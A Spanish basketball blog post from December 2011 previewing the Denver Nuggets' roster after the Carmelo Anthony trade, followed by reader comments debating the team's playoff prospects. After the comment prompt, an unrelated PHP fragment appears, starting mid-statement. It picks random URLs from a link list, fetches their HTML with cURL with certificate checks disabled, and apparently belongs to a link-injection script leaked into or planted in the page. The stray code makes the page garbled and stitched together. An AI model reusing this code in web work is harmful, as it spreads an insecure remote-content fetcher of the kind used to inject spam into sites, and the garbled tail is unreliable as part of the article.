Denver Nuggets: Profundidad de tapado

31 de December de 2011 por TheDeerHunter

El curso 2010-11 será recordado, entre otros aspectos, por el “trade deadline” más impresionante de la historia. Los Nuggets fueron los grandes animadores/vencedores con el traspaso de Carmelo Anthony y la llegada, a cambio, de un buen ramillete de buenas incorporaciones a la sólida estructura que ya habían confeccionado alrededor de su estrella. Pocas veces hemos visto una “reconstrucción” tan instantánea. El resultado no pudo ser más interesante. De inmediato, el equipo recién juntado llegó a desplegar un alto nivel, metiéndose en postemporada sin problemas y plantando cara a unos Thunder mucho más rodados y favoritos. Pero además, con una plantilla variada y atractiva más un considerable margen salarial del que disponer estaban en posición inmejorable para apuntalar el proyecto definitivamente en esta nueva dirección.

Antes del lockout ya habían recuperado a André Miller a cambio de Raymond Felton. El hijo pródigo que tan buen sabor de boca había dejado antes de la operación A.I. y, en mi modesta opinión, un director ideal para el estilo de juego George Karl. Se sumará a Ty Lawson que, en su tercer año, viene pisando fuerte y es complementario a André. Pueden formar una de las parejas de bases más completas de la competición.

El lockout les abría varios frentes. Por un lado hasta 3 jugadores vinculados a la franquicia firmaban en China sin cláusula de retorno. Por el otro se bloqueaba la renovación de Nené y Arron Afflalo. Curiosamente, después ambos frentes se han relacionado de alguna manera, despejando las dudas para renovar en buena lógica a los dos últimos (Afflalo un tanto caro) y teniendo la posibilidad de repescar a los “emigrados” en Marzo en caso de necesidad. Puede no ser el caso.

Sin ellos aún les queda cada posición bien cubierta. En las alas parten como titulares Arron Afflalo y Danilo Gallinari. Válidos y también complementarios en ataque y defensa. Completarán la rotación Rudy Fernandez, Corey Brewer, DeMarre Carroll y el rookie Jordan Hamilton. Bastantes alternativas de utilidad para George Karl. No son Carmelo pero no se puede quejar.

Por dentro, un gran acierto haber retenido a Nené. Resulta particularmente interesante la pareja que puede formar con los europeos Mozgov o Koufos. Hombres grandes y con maneras o jugar de 5 combinándose con Al Harrington, Chris Andersen o el rookie Kenneth Faried. Alternativas no le van a faltar.

Es un grupo sólido, con muchos recursos técnicos/tácticos y un entrenador que sabe qué es lo que tiene entre manos. Quizás les falta un gran jugador franquicia/estelar pero a cambio tienen una profundidad envidiable. Se trata de un equipo a seguir y puede dar mucha guerra en el Oeste.

Quinteto: Ty Lawson, Arron Afflalo, Danilo Gallinari, Nene, Timofey Mozgov/Kosta Koufos
6º hombre: André Miller

Pronóstico: Segunda ronda.

Comenta

16 comentarios a esta entrada

  1. pablisimo dice:
    #1

    En mi opinión deberían de haberse quedado con Felton ya que es bastante más joven con una mayor capacidad de progresión, además en un momento dado puedes sacar mas por el en un trade. Es una lastima lo de Kenyon Martin y sobretodo J.R Smith aunque esperemos que beneficie a Rudy. Aún así no creo que pasen de primera ronda en playoffs.

      Citar

  2. Uno cualquiera dice:
    #2

    Gran análisis TheDeerHunter.

    En cualquier caso, me parece excesivo darles segunda ronda, si bien es cierto que tras Oklahoma hay un ramillete de contenders en el oeste bastante igualados y entre los cuales puede suceder cualquier cosa (Grizzlies, Mavs, Clippers, Lakers, Blazers, Nuggets…)

      Citar

  3. pablisimo dice:
    #3

    Por así decirlo serán los Hawks del oeste

      Citar

  4. Vader dice:
    #4

    Creo que sois demasiado optimistas con Denver. ¿Segunda ronda? Yo creo que si se clasifican para playoff ya será mucho. No tienen mal equipo pero les hace falta una referencia, una estrella.

    Saludos

      Citar

  5. Rompe dice:
    #5

    Gran equipo. Quizás el más completo, pero como dices, a falta de un líder claro. Eso creo que le va a pasar factura. De todas maneras creo que quedará entre los 4 primeros y pasarán primera ronda…

      Citar

  6. Sancho88 dice:
    #6

    Pues para mí el líder debe ser Nené. Con ese contrato ya le toca dar un pasito adelante. Me encanta la vuelta de Andre al equipo 5 años después. Danilo es la bomba y a ver si Rudy saca la cabeza en una liga tan complicada para los aleros extranjeros. Como digo, los bases están geniales. Andre es dios, pero Afflalo tiene mucha progresión y a Lawson le toca redimirse de su horrendo lockout en Lituania.. Pero lo que más me gusta de este equipo son los pívots. Son centers de verdad, y Koufos y Mozgov garantizan una rotación equilibrada y con mucha calidad. Mozgov no funcionó en New York, es irregular, pero no sé, sigo esperando de él que se convierta en un crack porque lo tiene todo: físico, talento y juventud. Si mejora sus tiros libres y sus movimientos en la zona los hace más fluído dejará de hacer tantas faltas en ataque, pasos, etc. que son sus principales defectos. Y Koufos es el contrapunto, más estilista y con movilidad, aunque no tan grande por físico. Pero parece que está empezando bien la temporada. Como bien dices Deer, buena pinta estos Nuggets, y en el banquillo el único del club de las 1.000 victorias que sigue en activo, todo un caballero de este deporte y un gran líder para su equipo: George Karl.

    Equipo vistoso en el oeste, y con el mérito de reciclarse año a año con lo de carmelo, los chinos, etc.

      Citar

  7. Txusma dice:
    #7

    Mozgov sale de titular pero es incapaz de no hacer faltas. A ver si mejora ese aspecto y se consolida.

      Citar

  8. melo15 dice:
    #8

    Bueno no hay mucho que decir de estos Nuggets,tienen un equipo muy completo (ojala lo tuvieran los knicks) pero no creo que lleguen muy lejos en playoffs, no creo que lleguen a 2 ronda.
    Pero muy buen analisi Deer

      Citar

  9. Denise dice:
    #9

    Mucho mejor equipo que cuando estaba ese tal Carmelo.
    Cuando recuperen a los que estan en China, equipazo.
    Yo tambien me hubiera quedado con Felton, pedazo operacion la que hicieron los Blazers.

      Citar

  10. Sempren dice:
    #10

    Gran equipo, y mejor con los de China, pero les falta algo.
    No confío demasiado en Mozgov y Koufos, quizá por lo poco que confían en ellos allá (aunque Mozgov empieza a ser titular, a ver qué tal le va). Si consiguieran retener a JR y/o Chandler y quizá un 4 de totales garantías (una semiestrella) darían un paso adelante enorme, porque tienen un equipo muy equilibrado, con jugadores de calidad en todos los puestos (bueno, y también está Chris Andersen xD).
    Por ejemplo, con un Pau o un 4 así, tendrían a Miller/Lawson-Afflalo/Chandler-Gallinari-Pau-Nene brutal, más Andersen, uno de los pívots y uno de los aleros suplentes. En mi opinión serían totales candidatos al anillo, a poco que se diesen bien las cosas.

    Sin embargo, así son carne de primera ronda casi seguramente, a expensas que alguien de un paso adelante (Nene-Gallo), aunque muy muy duros de superar, y con opciones de llegar a donde les dejen.

      Citar

  11. Jose Luis dice:
    #11

    Gallo es el que va a dar ese paso adelante, anoche en el clutch time casi mete una pedazo de bandeja increíble… jajajajaja

      Citar

  12. melo15 dice:
    #12

    @denise, cuando estos nuggets lleguen a finales de conferencia me avisas.
    @sempren, te olvidas de jugadores como kenneth faried, y que tal si fichan a Milsap, en Utah ya tiene a Favors.
    Y tambiem de RudyXD

      Citar

  13. Jose Luis dice:
    #13

    A mí no me parecen tan gran equipo. En una regular season como esta, si pueden ganar muchos partidos debido a la amplitud del roster, pero en play-offs dudo mucho que pasen la primera ronda. Y que son mejores que aquel equipo de final de conferencia, más lo dudo. Creo que tendrán que hacer un melo-drama al revés, traspasar a 3 o 4 de sus jugadores por un “estrella” descontenta, no una superestrella, pero sí un jugador que anote y aporte mucho en los minutos que esté en pista.

      Citar

  14. Jose Luis dice:
    #14

    Por ejemplo, eso que dice Melo15. Cambiar a Millsap por Afflalo/Rudy + Brewer/Hamilton + algún expiring si tienen, no estaría nada mal. Hay que tener en cuenta que en Marzo pueden repescar a “los chinos” y no se notarían tanto esas bajas. Podrían tener la clasificación para play-offs ya casi asegurada e ir introduciéndolos, ya que son jugadores que estuvieron el año pasado y no necesitarán mucha adaptación.

      Citar

  15. melo15 dice:
    #15

    Bueno no se affalo me parece muy buen jugador, en plan Battier, gran defensor y con buen tiro desde la linea de 3.
    Ademas, yo si fuera los Jazz lo haria sin pensarmelo, para dejar espacio para la progresion de Favors, y si Kanter tambien esxplota pues tambien vendo a Jefferson, ya se que Jefferson es uno de los mejores centers, pero estos Jazz se han de decidir, o empiezan la recontruccion o seran los Pacers, de hace un par de años , que quedaban en decimos y no aspiraban a un pick alto en el draft.

      Citar

  16. German dice:
    #16

    Si en Marzo vuelven sus jugadores que estan en China los veo en semifinales tranquilamente.
    Por cierto, increible la bandeja que falla Gallinari anoche!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>